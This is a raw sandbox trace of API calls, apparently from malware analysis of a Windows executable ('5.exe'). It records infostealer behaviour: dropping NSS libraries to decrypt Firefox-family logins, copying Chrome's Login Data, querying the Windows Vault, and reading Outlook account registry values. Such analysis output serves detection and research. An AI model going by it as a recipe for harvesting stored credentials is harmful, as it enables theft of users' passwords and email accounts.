File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-time-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-utility-l1-1-0.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/freebl3.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/mozglue.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/msvcp140.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nss3.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nssdbm3.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/softokn3.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/ucrtbase.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/vcruntime140.dll, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\nss3.dll, type = file_attributes True 1
Fn
Environment Get Environment String name = PATH True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Set Environment String name = PATH, value = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Module Load module_name = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\nss3.dll, base_address = 0x73a90000 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitOnceExecuteOnce, address_out = 0x76c4d627 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleEx, address_out = 0x76c4c78f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandle, address_out = 0x76c5cbfc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimePreciseAsFileTime, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77168456 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WakeConditionVariable, address_out = 0x771d7de4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x7719409d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x76cb4b32 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSRWLock, address_out = 0x77168456 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x771629f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TryAcquireSRWLockExclusive, address_out = 0x77174892 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x771629ab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x76cb4b74 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWork, address_out = 0x76c4ee45 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SubmitThreadpoolWork, address_out = 0x771a8491 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWork, address_out = 0x7719d8e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, base_address = 0x74650000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeConditionVariable, address_out = 0x77168456 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = SleepConditionVariableCS, address_out = 0x76cb4b32 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = WakeAllConditionVariable, address_out = 0x7719409d True 1
Fn
System Get Time type = Performance Ctr, time = 19042016873 True 1
Fn
System Get Time type = Performance Ctr, time = 19042027985 True 1
Fn
System Get Time type = Performance Ctr, time = 19042039154 True 1
Fn
System Get Time type = Performance Ctr, time = 19042050141 True 1
Fn
System Get Time type = Performance Ctr, time = 19042060963 True 1
Fn
System Get Time type = Performance Ctr, time = 19042071525 True 1
Fn
System Get Time type = Performance Ctr, time = 19042082397 True 1
Fn
System Get Time type = Performance Ctr, time = 19042093322 True 1
Fn
System Get Time type = Performance Ctr, time = 19042104141 True 1
Fn
System Get Time type = Performance Ctr, time = 19042114720 True 1
Fn
System Get Time type = Performance Ctr, time = 19042125440 True 1
Fn
System Get Time type = Performance Ctr, time = 19042135778 True 1
Fn
System Get Time type = Performance Ctr, time = 19042146153 True 1
Fn
System Get Time type = Performance Ctr, time = 19042156717 True 1
Fn
System Get Time type = Performance Ctr, time = 19042167498 True 1
Fn
System Get Time type = Performance Ctr, time = 19042178398 True 1
Fn
System Get Time type = Performance Ctr, time = 19042189328 True 1
Fn
System Get Time type = Performance Ctr, time = 19042199927 True 1
Fn
System Get Time type = Performance Ctr, time = 19042210637 True 1
Fn
System Get Time type = Performance Ctr, time = 19042221395 True 1
Fn
System Get Time type = Performance Ctr, time = 19042232255 True 1
Fn
System Get Time type = Ticks, time = 126610 True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_open, address_out = 0x73ae49c9 True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_close, address_out = 0x73ae3341 True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_prepare_v2, address_out = 0x73acd529 True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_step, address_out = 0x73aacfda True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_column_text, address_out = 0x73aad453 True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_column_bytes, address_out = 0x73aad37e True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = sqlite3_finalize, address_out = 0x73aac7d3 True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = NSS_Init, address_out = 0x73b20391 True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x73b448fe True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = PK11_Authenticate, address_out = 0x73b2d0d8 True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x73b4089d True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = NSS_Shutdown, address_out = 0x73b2061c True 1
Fn
Module Get Address module_name = c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll, function = PK11_FreeSlot, address_out = 0x73b44370 True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\.\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\..\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\logins.json, type = file_attributes False 1
Fn
System Get Info type = Hardware Information True 2
Fn
Environment Get Environment String name = MALLOC_OPTIONS False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadDescription, address_out = 0x0 False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, base_address = 0x400000 True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles\\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Waterfox\Profiles\\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Comodo\IceDragon\Profiles\\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\8pecxstudios\Cyberfox\Profiles\\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\\logins.json, type = file_attributes False 1
Fn
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp True 1
Fn
System Get Info type = Hardware Information True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, type = file_attributes True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, size = 100, size_out = 100 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, size = 2048, size_out = 2048 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-journal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp, size = 2048, size_out = 2048 True 1
Fn
Data
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x755fe599 True 1
Fn
Module Load module_name = vaultcli.dll, base_address = 0x73500000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultOpenVault, address_out = 0x735026a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x73503099 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetItem, address_out = 0x73503242 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer, value_name = Version, data = 8.0.7601.17514, type = REG_SZ True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = Email, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, data = 0, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Server, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Fn
